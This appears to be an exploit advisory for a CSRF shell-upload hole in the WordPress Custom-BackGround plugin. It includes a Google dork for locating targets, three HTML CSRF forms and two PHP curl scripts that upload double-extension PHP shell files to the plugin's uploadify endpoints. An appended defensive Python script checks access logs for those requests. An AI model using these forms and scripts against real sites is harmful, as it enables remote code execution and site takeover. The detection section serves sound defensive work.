WordPress Custom-BackGround Plugins 3.0 CSRF Shell Upload Vulnerability

2020.03.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

####################################################################
# Exploit Title : WordPress Custom-BackGround Plugins 3.0 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/03/2020
# Vendor Homepage :
# Software Link : plugins.righthere.com/custom-backgrounds/
# Software Affected Version : Requires at least: 3.0 / Tested up to: 3.3.1 / Stable tag: 3.1.5 rev22255
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : inurl:/wp-content/plugins/custom-background/
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
#                      CWE-264 [ Permissions, Privileges, and Access Controls ]
#                      CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################

# Impact :
***********

WordPress Custom-BackGround Plugins 3.0 is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

CWE-352: Cross-Site Request Forgery (CSRF)
******************************************

The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted it. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, an attacker may be able to trick a client into making an unintentional request to the web server, which is then treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc., and can result in exposure of data or unintended code execution.

CWE-264: Permissions, Privileges, and Access Controls
*****************************************************

Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

CWE-434: Unrestricted Upload of File with Dangerous Type
********************************************************

The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************************

# CSRF Cross Site Request Forgery Exploiter 1 =>
***********************************************

<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/custom-background/uploadify/uploadify.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

# CSRF Cross Site Request Forgery Exploit 2 =>
*********************************************

<title>WordPress Custom-BackGround Plugins Exploiter</title>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/custom-background/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<body background=" ">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.php.pjpg" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>

# CSRF Cross Site Request Forgery Exploit 3 =>
*********************************************

<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/custom-background/uploadify/uploadify.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

PHP Exploiter Code 1 :
*********************

<?php
$uploadfile = "kingskrupellos.php.pjpg"; // KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

PHP Exploiter Code 2 :
*********************

<?php
$uploadfile = "kingskrupellos.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile", 'folder' => '/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# Vulnerability Error :
**********************

{"R":"ERR","MSG":"No access"}

/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
/wp-content/plugins/custom-background/uploadify/uploadify.php

####################################################################
# Example Vulnerable Sites :
****************************
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
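As an added defensive example (not part of the advisory or of the plugin's own code), the following Python script triages web-server access logs for POSTs to the two uploadify endpoints the advisory lists, marks requests whose Referer is missing or off-site (the cross-site pattern CWE-352 describes), and rejects upload names built like the double-extension and traversal values the exploit forms submit. The log lines, host names and the EXEC_EXTS set are constructed assumptions, not data from the page.

```python
import re
from urllib.parse import urlsplit

# Upload endpoints named in the advisory; matched by suffix since a site may live in a subdirectory.
UPLOAD_ENDPOINTS = (
    "/wp-content/plugins/custom-background/uploadify/uploadify.php",
    "/wp-content/plugins/custom-background/uploadify/uploadAttachment.php",
)
# Assumed set of extensions a web server may execute even when hidden in a chain such as x.php.pjpg.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Combined log format: ip ident user [ts] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def is_dangerous_filename(name: str) -> bool:
    """Reject path traversal and any executable extension anywhere in the extension chain."""
    if "/" in name or "\\" in name or ".." in name:
        return True
    return any(part in EXEC_EXTS for part in name.lower().split(".")[1:])

def triage_upload_posts(log_lines, site_host):
    """One finding per POST to an uploadify endpoint; cross_site marks a missing or foreign Referer."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = m.group("path").split("?", 1)[0]
        if not any(path.endswith(ep) for ep in UPLOAD_ENDPOINTS):
            continue
        ref_host = urlsplit(m.group("referer")).hostname or ""
        findings.append({"ip": m.group("ip"), "path": path, "status": int(m.group("status")),
                         "cross_site": ref_host != site_host})
    return findings

# Constructed sample log lines (not real traffic); addresses and hosts are documentation values.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Mar/2020:10:00:01 +0000] "POST /wp-content/plugins/custom-background/uploadify/uploadify.php HTTP/1.1" 200 27 "http://attacker.example/csrf.html" "Mozilla/5.0"
198.51.100.4 - - [19/Mar/2020:10:00:02 +0000] "POST /shop/wp-content/plugins/custom-background/uploadify/uploadAttachment.php HTTP/1.1" 200 27 "https://www.example.org/wp-admin/" "Mozilla/5.0"
198.51.100.9 - - [19/Mar/2020:10:00:03 +0000] "GET /wp-content/plugins/custom-background/uploadify/uploadify.php HTTP/1.1" 403 199 "-" "curl/7.64.0"
"""

if __name__ == "__main__":
    for finding in triage_upload_posts(SAMPLE_LOG.splitlines(), "www.example.org"):
        print(finding)
```

A hit with cross_site set and a 2xx status is the combination worth investigating first; the same-site POST from an authenticated admin page is expected plugin traffic.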


Copyright 2024, cxsecurity.com